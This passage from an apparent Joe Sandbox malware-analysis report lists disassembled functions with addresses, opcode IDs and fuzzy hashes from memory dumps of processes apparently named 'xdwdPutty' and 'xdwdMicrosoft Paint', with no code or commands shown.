                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 64c122275963349e0ab0df22a6d9bba72ac7aa29d1a784026ee9e90ded2f50e0
                              • Instruction ID: 1b9767718d660165bafe923e2bd6e55268784a21d42b89df6e1d5bc7b0f58939
                              • Opcode Fuzzy Hash: 64c122275963349e0ab0df22a6d9bba72ac7aa29d1a784026ee9e90ded2f50e0
                              • Instruction Fuzzy Hash: 4CD09E22D2C13682FEA02058DC604FA43C8CB50374F7E05B2EC5C273C44C8F6C9029C2
                              Function 00007FFF60F5860C Relevance: .0, Instructions: 15COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F56000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F56000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f56000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b12fcf0a822471ffbc597dff52a96b927e42a264b4d85ff4e689588ba082d923
                              • Instruction ID: 11c8be6eb31272ddf964f616eeef82e0b6953db18d907647d011bd19f9dd8280
                              • Opcode Fuzzy Hash: b12fcf0a822471ffbc597dff52a96b927e42a264b4d85ff4e689588ba082d923
                              • Instruction Fuzzy Hash: 47D0123164A31589E759373965111A862C1EF45255F9405B9E90DC43A2FD2EC5C14350
                              Function 00007FFF60F5FC5A Relevance: .0, Instructions: 15COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 368ce2de55525b16e59f23ee5a579df1872489e3319a6cf8f0180b1f450e61fc
                              • Instruction ID: 974698b54d0fa97556c4e41b2055b6b25173c5ca4c0802b70aa9700f09cc2092
                              • Opcode Fuzzy Hash: 368ce2de55525b16e59f23ee5a579df1872489e3319a6cf8f0180b1f450e61fc
                              • Instruction Fuzzy Hash: 91C08C01B1D805169118515CB81637413C2C3EC6B0B40026BF00EC3386EC2099434286
                              Function 00007FFF60F5DA84 Relevance: .0, Instructions: 10COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d2e64fca73910bf5fae3d8bbe558913e7d46965b94c82908c63cd92f425b1913
                              • Instruction ID: 5c2d11498b9a151e651f52395160cbb259868c653d392c1f487522f5a05bda3f
                              • Opcode Fuzzy Hash: d2e64fca73910bf5fae3d8bbe558913e7d46965b94c82908c63cd92f425b1913
                              • Instruction Fuzzy Hash: 2DA011233CA80800A00080CA3C820C8B308C8C00BAB8B2223EA2CC8A00C28B08AA0280
                              Function 00007FFF60F5DC14 Relevance: .0, Instructions: 9COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 00812db557edf4e9e16d0fa7d87e43932268a51e7e5c2cc43ecc039abe2aac21
                              • Instruction ID: 41f7b8ae4aa3adab2b21f6641b2bb222f0d034a37f96a2e35ce4bc1c05dd53ed
                              • Opcode Fuzzy Hash: 00812db557edf4e9e16d0fa7d87e43932268a51e7e5c2cc43ecc039abe2aac21
                              • Instruction Fuzzy Hash: D8A0022B7E586A01A60015DEBC130E8F355C9C507A74B1473EA7CC5E90D6DB46F70195
                              Function 00007FFF60F5B885 Relevance: .0, Instructions: 9COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cceb4dd2797d54daf5f82da7e9d87be9702c556677e9fbcfe07ffb99d7d76cd8
                              • Instruction ID: 11c8c8abb8210429bacd2fa93b345472f3609ca5d9c22a3646ef0daf05bc4d83
                              • Opcode Fuzzy Hash: cceb4dd2797d54daf5f82da7e9d87be9702c556677e9fbcfe07ffb99d7d76cd8
                              • Instruction Fuzzy Hash: ECB0141113D404555745D714C45D1F573D0D77C1047400F35544DC1155FC005DC14345
                              Function 00007FFF60F5C9FC Relevance: .0, Instructions: 5COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000037.00000002.1304482939.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_55_2_7fff60f5a000_xdwdPutty.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0a8f6d2ba66b6883539cbedcb78a86d650134bd54004b97b605a57cc4b80f6af
                              • Instruction ID: 11d2970242c9edd4bc205d4434652bffd133f67d3eede3213a576c7e834004f9
                              • Opcode Fuzzy Hash: 0a8f6d2ba66b6883539cbedcb78a86d650134bd54004b97b605a57cc4b80f6af
                              • Instruction Fuzzy Hash: C3A00210B1584F1A63C4A12C041927941CBE7B92C1F6440F7590DCA2A7DD155C424A15

                              Executed Functions

                              Function 00007FFF60F699A8 Relevance: .5, Instructions: 518COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3d69e06e215993e2e1a721c22deaafb0acb1d1f2635331fbb8b413ddb3aafa3e
                              • Instruction ID: e9f194902aeba64ab8d69aefe113f88e7d0b7f3df0a55c1e34400404014641bf
                              • Opcode Fuzzy Hash: 3d69e06e215993e2e1a721c22deaafb0acb1d1f2635331fbb8b413ddb3aafa3e
                              • Instruction Fuzzy Hash: 19F13A66C2C54B8AFB19BB6488422F977D8DF51320F28017DE44AC7697FD1CB50B9392
                              Function 00007FFF60F6B875 Relevance: .4, Instructions: 444COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 359663552de5931ef172096e87b9b51932daa4f5da5504e1a4996bb1be056838
                              • Instruction ID: cd709529414f5f1b2645b726773925b89530e6ee0765bba1248eb1a1c88157b8
                              • Opcode Fuzzy Hash: 359663552de5931ef172096e87b9b51932daa4f5da5504e1a4996bb1be056838
                              • Instruction Fuzzy Hash: 63D1E921D3D7878EF766922488551B97BE8DF12311F7809B6F489CB2D3DD0D288BA352
                              Function 00007FFF60F62918 Relevance: .8, Instructions: 821COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e47019bd181f27435cbdf899412ee454e6f7df2158452146a7bdb83a95eada39
                              • Instruction ID: 6269f3569dcfe40f7025a15636aecdbc188de817437ee756c2c9496074d39d46
                              • Opcode Fuzzy Hash: e47019bd181f27435cbdf899412ee454e6f7df2158452146a7bdb83a95eada39
                              • Instruction Fuzzy Hash: 85524D21F2C9178BFB94A76890A15BD36D6EF94315FA50839E10EC73C6DE2DAC426341
                              Function 00007FFF60F62B45 Relevance: .3, Instructions: 342COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: aabc8dc5e354f361e36ed924541996ee06e639b8cc276601c02780f55c5a735a
                              • Instruction ID: 0aa47814b2fa811ec123cc6c11bc7a499b070b71429b72e5cbf3e501c22065bb
                              • Opcode Fuzzy Hash: aabc8dc5e354f361e36ed924541996ee06e639b8cc276601c02780f55c5a735a
                              • Instruction Fuzzy Hash: 88C13F21F2C9078AFB98A76890A15BD36D6EFD4315FA60839E10EC77C6DE2DAC425301
                              Function 00007FFF60F6C090 Relevance: .2, Instructions: 246COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a9dbb08862d3b1c10c555e9520be8b22b6f7ac36780bd12fb84c540ea0b56fbf
                              • Instruction ID: f2f4c32897c3a742f1a8acd7ed6c4f730f3bf727d5abd19ec7c81f9036d95d72
                              • Opcode Fuzzy Hash: a9dbb08862d3b1c10c555e9520be8b22b6f7ac36780bd12fb84c540ea0b56fbf
                              • Instruction Fuzzy Hash: DD71E431D2C51A8AFF68E658D8566BD73D4EF69300F74093AE98DC73C2DE1D6805A2C1
                              Function 00007FFF60F63550 Relevance: .2, Instructions: 222COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e53d0329d233e323acff1516370ed1da76f3743b47c731bf27a2f4edd250c995
                              • Instruction ID: 9d85e95c53e9ec0b069e4ffbecc55d160a0dee425c411375ce200bdd7fd96074
                              • Opcode Fuzzy Hash: e53d0329d233e323acff1516370ed1da76f3743b47c731bf27a2f4edd250c995
                              • Instruction Fuzzy Hash: 8D51D331C3C4A689F7781628E4824F9A7C9EF55320FA50078FCAE837C7AC1D6CA651C2
                              Function 00007FFF60F68635 Relevance: .2, Instructions: 208COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8dbf03bfa1b887d07cab735db30ce4874be87b280eedc9401f7aaa88b13c2ab2
                              • Instruction ID: 8fc9b4a373f729831252f9789770d003ec729bdfe8d1183e84e204b53acb389d
                              • Opcode Fuzzy Hash: 8dbf03bfa1b887d07cab735db30ce4874be87b280eedc9401f7aaa88b13c2ab2
                              • Instruction Fuzzy Hash: 0D510320A2E6868FF701A778D8A51B53BD4EF57310F2802BAE449C72D3ED4D68479392
                              Function 00007FFF60F6457F Relevance: .2, Instructions: 181COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b31cffdfc370a7633bdff43a62fe01c52bf088b5f75d9640b68154dd9c90dd5e
                              • Instruction ID: b8e153cd6dc22aa8ac56b115ae0304a3098e1e990be4be6822b2554dd3887539
                              • Opcode Fuzzy Hash: b31cffdfc370a7633bdff43a62fe01c52bf088b5f75d9640b68154dd9c90dd5e
                              • Instruction Fuzzy Hash: 91512E71918A1C8FDB98EF58D845BE9BBF1FB58310F1082AAD40DE3255DF34A9858F81
                              Function 00007FFF60F6A530 Relevance: .2, Instructions: 174COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d2ba1ec6efd8564f3cd7d6e3186afce93e200f6e687b74e53de849c6027ab2e1
                              • Instruction ID: ad7db441c9791f3b2ede2fa9a0ad53bc1de91deb45af6d57c0d611c32723aaa8
                              • Opcode Fuzzy Hash: d2ba1ec6efd8564f3cd7d6e3186afce93e200f6e687b74e53de849c6027ab2e1
                              • Instruction Fuzzy Hash: C651433191D6998FD746E76888556E57FE0EF4B220B1901FBE089CB1A3EE2C5C0BC752
                              Function 00007FFF60F62FEA Relevance: .2, Instructions: 161COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 320a919ff14f4209b535b1eec53c18870815350380e8f72e95048562276aced0
                              • Instruction ID: 6e08fc032e0b7fa26e39f8422e2bc8ba0a67cd0f1d33a06e00b21014e1abde0f
                              • Opcode Fuzzy Hash: 320a919ff14f4209b535b1eec53c18870815350380e8f72e95048562276aced0
                              • Instruction Fuzzy Hash: DA517E61F2C40797FB58A76894A66BD36CAEF94306FA40439F10DC33C6EE2CAD465342
                              Function 00007FFF60F622B5 Relevance: .2, Instructions: 159COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8d609fce21b9a956b263d31d3e7511aeab587c5504e7a327ef831d54e588a6ae
                              • Instruction ID: 37dd72109ad310dca90fa9c63d94436b43e18e6edd8b25c0f95fb8c344a8cab9
                              • Opcode Fuzzy Hash: 8d609fce21b9a956b263d31d3e7511aeab587c5504e7a327ef831d54e588a6ae
                              • Instruction Fuzzy Hash: 93517531F2C94786FB94A668C4521FD23CAEF95314F390539E54DC73C2DE2EAC665282
                              Function 00007FFF60F63540 Relevance: .1, Instructions: 149COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c6e6a4b117573cfb522b2dacea4d3e4b984f85b478f3b53010917d4cd8e008c9
                              • Instruction ID: 342477fc24cc95760f9b31ce9800360ed2f33d8e490b21e61957294845c46084
                              • Opcode Fuzzy Hash: c6e6a4b117573cfb522b2dacea4d3e4b984f85b478f3b53010917d4cd8e008c9
                              • Instruction Fuzzy Hash: 8F418121C3C5928AF7784628F8C24FDB2D9EB45720F64017DECAA827C7AC1D6CA611C3
                              Function 00007FFF60F61B9F Relevance: .1, Instructions: 139COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 967c8bb9a88c06f8754349d8a54a414258f430ea42efe6120d895fe68c370a76
                              • Instruction ID: 5e1f601ee3e8894e2b85a2ad514e0683ef952fd772baf06062ebe8acbaf90198
                              • Opcode Fuzzy Hash: 967c8bb9a88c06f8754349d8a54a414258f430ea42efe6120d895fe68c370a76
                              • Instruction Fuzzy Hash: 5D418101F2C51786EB487BB822661BF1DE79F84302BE54838F14ED7BCFDD69AA021251
                              Function 00007FFF60F6ACC4 Relevance: .1, Instructions: 138COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ac5e6c75e15fac26ea51e2672be123809c2140c20d2e233b2ad727a915728955
                              • Instruction ID: 8a5f61c34fc75296c0e6e2eda12a82cf9d7e3383dde0aeab6877fd27610d1b16
                              • Opcode Fuzzy Hash: ac5e6c75e15fac26ea51e2672be123809c2140c20d2e233b2ad727a915728955
                              • Instruction Fuzzy Hash: 6641B630A28D1E8FEB95EB6C84652FCB7E1FF58311B6401BAE40DD7396DE25AC429740
                              Function 00007FFF60F631F2 Relevance: .1, Instructions: 136COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 402dfc5c1842625a50aac6c0268bb2b18fe0d4072ce9c69d08344a25a4181379
                              • Instruction ID: 4114ab3a00b90e9a1108c6bbf8beda95fe29c628a1ea68f3fdd22dbbcb5a4403
                              • Opcode Fuzzy Hash: 402dfc5c1842625a50aac6c0268bb2b18fe0d4072ce9c69d08344a25a4181379
                              • Instruction Fuzzy Hash: 8141FE61F2C91A8BEB94F76880B55BD26D7EB98312B650439E10DC33D6DE3DAC426340
                              Function 00007FFF60F6AF47 Relevance: .1, Instructions: 135COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b4a91c5da0219912bcf87029f3672469049a73e1be3cc2e319785cecc9fc6e63
                              • Instruction ID: feb031b93f4811739101f86427c460a0cabf9f29ab167a5f8c9579b985eaa6e7
                              • Opcode Fuzzy Hash: b4a91c5da0219912bcf87029f3672469049a73e1be3cc2e319785cecc9fc6e63
                              • Instruction Fuzzy Hash: 5E415B31A2C81A9FEB94EB68D4656BC77E5FF58301F24007AE50ED3392DE2868819740
                              Function 00007FFF60F6C521 Relevance: .1, Instructions: 110COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4647cd0f9e0a4e24ca780d21fd0e8100e397f712e3b2c0ad750210e09adddf4e
                              • Instruction ID: 7d9adb5e337acd34cb42d2ff174f516e72ba2b358e2f8a4e9f183ec3db03aed5
                              • Opcode Fuzzy Hash: 4647cd0f9e0a4e24ca780d21fd0e8100e397f712e3b2c0ad750210e09adddf4e
                              • Instruction Fuzzy Hash: 10311931A18A1C8FDF94EB68D889BEDB7F1FB58311F10416AD44ED3252DF34A9868B41
                              Function 00007FFF60F6C18F Relevance: .1, Instructions: 89COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cdb2988f97767fa7580ce67a06d627f48ddf85f1a39bb17844b35d4d6b9c45b9
                              • Instruction ID: 9e1e943e0440581443f24f74c6320032dd5fff227fbdd981214d48a7fee26507
                              • Opcode Fuzzy Hash: cdb2988f97767fa7580ce67a06d627f48ddf85f1a39bb17844b35d4d6b9c45b9
                              • Instruction Fuzzy Hash: 83217372D2C50B86FF68D5A8C82637833D4DB65311F740A3AE99DD33D1ED1C651A51C1
                              Function 00007FFF60F633DE Relevance: .1, Instructions: 88COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8475ddf24f026dd722fa176073e741de48a5b5196e46260c5ce4ad426236df69
                              • Instruction ID: f651ddfd8b645190866df36fa749456d282a1e9d270f2e3fd79ec52e5ff7f673
                              • Opcode Fuzzy Hash: 8475ddf24f026dd722fa176073e741de48a5b5196e46260c5ce4ad426236df69
                              • Instruction Fuzzy Hash: 11212765A0E3C24FEB13977498A52A47FB18F53224F1A01F7D089CB5E3E91D985B8362
                              Function 00007FFF60F6B007 Relevance: .1, Instructions: 85COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c3f04d0f8e2c02adc6728c506bbc8578725da070206482c87a624c9e26929aec
                              • Instruction ID: 4abd7eb13c2196e4ff344b4df17e044e4da79c40cf9b105dd931c5dabf708ee6
                              • Opcode Fuzzy Hash: c3f04d0f8e2c02adc6728c506bbc8578725da070206482c87a624c9e26929aec
                              • Instruction Fuzzy Hash: 1C213B31A2C81ADFEB94FB68C4596BC77E5FF58301F200479F51ED32A2DE2868819741
                              Function 00007FFF60F67D46 Relevance: .1, Instructions: 83COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5985ced97a8794e629e837d16d9afb3a40ffa3d72b5cb696e670c090a7d82594
                              • Instruction ID: 11e1ddf9b1280c291f0a01cb9a4553a28bf73d664603f2e79009912875791471
                              • Opcode Fuzzy Hash: 5985ced97a8794e629e837d16d9afb3a40ffa3d72b5cb696e670c090a7d82594
                              • Instruction Fuzzy Hash: 78312870518B8C8FEBA4DF28C8457D97BE1FFA8710F10866AE84DC7255CB39A945CB81
                              Function 00007FFF60F6C171 Relevance: .1, Instructions: 83COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9682d0d571bc3a6e9e55d9812949b17d70f1f903877f6043d99297ef8eb7b967
                              • Instruction ID: 715d38286a14fdfa36cd7bb51f48086088784d345e62286e4809a16c7395ea46
                              • Opcode Fuzzy Hash: 9682d0d571bc3a6e9e55d9812949b17d70f1f903877f6043d99297ef8eb7b967
                              • Instruction Fuzzy Hash: B1219062D2C04786FF6C9A98C82A27837D8DF25311F351A3AE99DC77D2ED1C650A61C1
                              Function 00007FFF60F69231 Relevance: .1, Instructions: 80COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d1e27da35fc186851482d9d12c47c844ea22ca2b38fd075b31840c9a49955891
                              • Instruction ID: 94e343e24e4fd584ffa5db7395b61872bbb73c926eb26712355384415577c707
                              • Opcode Fuzzy Hash: d1e27da35fc186851482d9d12c47c844ea22ca2b38fd075b31840c9a49955891
                              • Instruction Fuzzy Hash: F421B322E1C645CFEB569728C8656A83BE8EF66320F2901B7E04DD73D2EC2C5C099352
                              Function 00007FFF60F6AF4D Relevance: .1, Instructions: 69COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b7f85f3313491f379d3799113982f425b722dc6572b9acedf6936d56b9672230
                              • Instruction ID: 20fd845b4c212ede2b13a25f52715c660a816d026d3250b02781aa3d1d2d6a30
                              • Opcode Fuzzy Hash: b7f85f3313491f379d3799113982f425b722dc6572b9acedf6936d56b9672230
                              • Instruction Fuzzy Hash: 83115170A2991A8FE794F73C84692BC77E1FF5C311B5404B9E50EE33A2ED24AC419780
                              Function 00007FFF60F637DA Relevance: .1, Instructions: 61COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 30ea7f37ef71406a1e2a723d45fd85f5fc0c50b9fbfe09e61c3687123046b3f6
                              • Instruction ID: 700ebdb907ce520a6ab04d3cbb85751d4a48de553b5f66f98c6b76ee2fae32ea
                              • Opcode Fuzzy Hash: 30ea7f37ef71406a1e2a723d45fd85f5fc0c50b9fbfe09e61c3687123046b3f6
                              • Instruction Fuzzy Hash: 62018032F2DD6A8AF694663C91652F863D6EB59320B5904BBE80EE33D1ED1D5C825380
                              Function 00007FFF60F6D16D Relevance: .1, Instructions: 57COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fc6cc2b936536ffc1f8e15366c99711c73249d7e81d6554c474f2e041c156c97
                              • Instruction ID: 0dbab03d18b43dd1fb1cd92906d38309a8bb8977119e490f1f89df2d0d9209e4
